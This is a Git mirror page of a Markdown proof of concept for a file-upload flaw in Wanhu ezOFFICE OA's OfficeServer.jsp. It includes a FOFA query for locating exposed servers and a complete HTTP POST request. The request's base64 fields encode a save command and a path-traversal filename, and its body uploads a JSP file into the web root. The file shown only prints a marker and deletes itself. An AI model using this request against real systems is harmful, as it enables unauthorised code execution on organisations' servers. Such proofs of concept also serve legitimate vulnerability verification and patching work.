admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-30 14:34:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/万户OA/万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

29 lines
707 B
Markdown
Raw Blame History

## 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞
## fofa
```
banner="OASESSIONID" && banner="/defaultroot/"
```
## poc
```
POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0
DBSTEP V3.0 145 0 105 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Ly8uLi8uLi9wdWJsaWMvZWRpdC83Yzc1QWYuanNw
<% out.println("5EA635");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
```
文件路径`/defaultroot/public/edit/7c75Af.jsp`
![image-20240626231259719](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406262312795.png)
Reference in New Issue View Git Blame Copy Permalink